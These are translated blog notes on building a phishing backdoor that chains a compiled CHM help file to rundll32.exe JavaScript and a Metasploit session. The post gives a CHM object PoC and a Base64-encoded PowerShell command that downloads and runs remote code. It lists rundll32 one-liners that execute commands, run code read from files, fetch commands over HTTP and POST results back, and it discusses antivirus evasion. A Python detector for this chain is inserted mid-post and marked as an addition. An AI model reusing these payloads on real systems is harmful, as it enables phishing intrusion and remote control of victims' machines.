Spent some time studying the bundled backdoor from evi1cg's blog; these are my notes.

0x01 Approach

Approach:
A CHM backdoor launches rundll32.exe, which executes JavaScript that fetches the malicious code and runs it.

Result:
An interactive shell or meterpreter (PowerShell).

0x02 CHM backdoor

calc.exe PoC

```html
<!DOCTYPE html><html><head><title>Mousejack replay</title></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
```

Compile the HTML file into a CHM with EasyCHM.

Run it:
(screenshot omitted)

0x03 JS backdoor

Core idea: rundll32.exe executes a JavaScript script that contacts the C&C and runs the malicious code.

PoC:

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');
```

(screenshot omitted)

0x04 CHM + JS bundling

Approach:
CHM backdoor -> calls rundll32.exe -> runs JavaScript -> contacts the target C2 server -> executes the malicious code -> interactive shell

Advantage:
Avoids the pop-up window that a traditional CHM backdoor causes when it runs CMD /c.

Disadvantage:

Getting a Meterpreter session directly

Exploit used: exploit/multi/script/web_delivery
(screenshot omitted)

The generated command contains special characters and cannot be run directly under cmd, so it is Base64-encoded:
(screenshot omitted)

PowerShell:

```
powershell -ep bypass -enc PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAzADoAOAAwADgAMQAvADEALwAnACkAOwAKAA==
```

But:
(screenshot omitted)

It does not bypass 360's active defense.
If the program is allowed to run, you get both a JSRAT session and a meterpreter session.
(screenshot omitted)

What gets detected is mainly the sensitive rundll32.exe process.
(screenshot omitted)
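The detection point above, seen from the defender's side, as an added example that is not from the original post or from evi1cg's code: a small Python check over constructed Sysmon-style process-creation events that flags the traces this chain leaves on an endpoint (rundll32.exe hosting a javascript: command line, and encoded PowerShell spawned by rundll32). The hh.exe parent (the Windows HTML Help viewer that opens CHM files) is an assumption; the page does not name it.

```python
import re

# Constructed Sysmon-style process-creation events for illustration;
# these are not real telemetry from the post.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";alert(\'foo\');',
     "ParentImage": r"C:\Windows\hh.exe"},            # CHM viewer -> rundll32 (the chain in this post)
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},      # ordinary rundll32 use, must not fire
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass -enc AAAAAAAA",   # constructed, not the post's blob
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},  # rundll32 -> encoded PowerShell
]

# rundll32 being used as a JavaScript host through mshtml's RunHTMLApplication export
JS_HOST_RE = re.compile(r"javascript:|RunHTMLApplication", re.IGNORECASE)
# -enc / -encodedcommand / -e followed by a payload (not -ep, which is -ExecutionPolicy)
ENC_PS_RE = re.compile(r"\s-(enc|encodedcommand|e)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons an event looks like the CHM + JS chain (empty list = benign)."""
    reasons = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    if image == "rundll32.exe" and JS_HOST_RE.search(cmd):
        reasons.append("rundll32 hosting javascript via mshtml")
    if image == "rundll32.exe" and parent == "hh.exe":
        reasons.append("rundll32 spawned by the CHM viewer (hh.exe, assumed parent)")
    if image == "powershell.exe" and parent == "rundll32.exe" and ENC_PS_RE.search(cmd):
        reasons.append("encoded PowerShell spawned by rundll32")
    return reasons


def scan(events):
    """(index, reasons) for every event that trips at least one rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(i, "; ".join(reasons))
```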

0x05 Summary

Advantages of the JS backdoor:

  1. Nothing is written to disk
  2. Persistent control
  3. The background rundll32.exe process is stable

Disadvantage:
Not AV-evasive; easily detected

Advantages of the CHM backdoor:
Strong phishing lure
Not flagged by AV itself; it is only detected when it invokes a dangerous process, since the file contains no malicious code of its own

Used together, they achieve the same no-pop-up effect as nishang.

0x06 JS backdoor Tips

//Execute A Command

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc");
```

//Write To A File

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close;
```

//Read and Execute From A File

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval((f.ReadAll()));
```

//Map A Remote Share (WEBDAV)

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https://live.sysinternals.com");self.close;
```

//Map A Local Share

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","\\\\Localhost\\c$");self.close;
```

//Read and Execute Commands From A File

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);};
```

//Retrieve Commands From HTTP

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();B=h.ResponseText;alert(B);
```

//POST results back to Server

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("POST","http://127.0.0.1:8081/a.php",false);h.Send("Stuff");
```

https://evi1cg.me/archives/chm_backdoor.html
http://drops.wooyun.org/tips/8568
https://github.com/Ridter/MyJSRat
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/12386